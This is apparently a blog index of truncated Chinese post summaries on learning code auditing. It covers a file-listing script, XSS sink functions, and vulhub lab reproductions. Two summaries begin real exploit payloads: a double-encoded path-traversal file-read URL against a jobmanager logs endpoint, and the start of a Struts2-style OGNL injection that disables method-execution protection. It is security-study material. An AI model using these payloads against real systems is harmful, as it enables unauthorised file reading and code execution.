Tankcz

摘要： 1. 刚学代码审计，看到什么骚操作都想学，这个是在b站上看到的一位up用的脚本 如果拿到了一个站的源码，但是无法进入后台(可以自己直接搭建。。)，那就要找前台的漏洞 通过这个脚本列出来源码中的所有文件 import osdef all_path(dirname): result = [] for m 阅读全文

摘要： xss xss中文跨站脚本攻击，在web漏洞中出现次数最多的漏洞 挖掘xss漏洞的关键在于寻找没有被过滤的参数，且这些参数传入到输出函数 常用的输出函数有：echo、print、print_r、printf、sprintf、die、var_dump、var_export 所以只要寻找带有变量的这些函 阅读全文

摘要： 今天在公众号上看到了一个qq存储型xss https://mp.weixin.qq.com/s/B-Q1GBgrIQl14qumzXuXTw 大佬牛逼 阅读全文

摘要： vvulhub搭建 docker-compose up -d 访问8081端口，进入控制面板 任意文件读取exp http:/x.x.x.x:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f.. 阅读全文

摘要： 使用vulhub搭建 docker-compose build docker-compose up -d 访问8080端口，进去是空白的 抓包使用exp ${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberA 阅读全文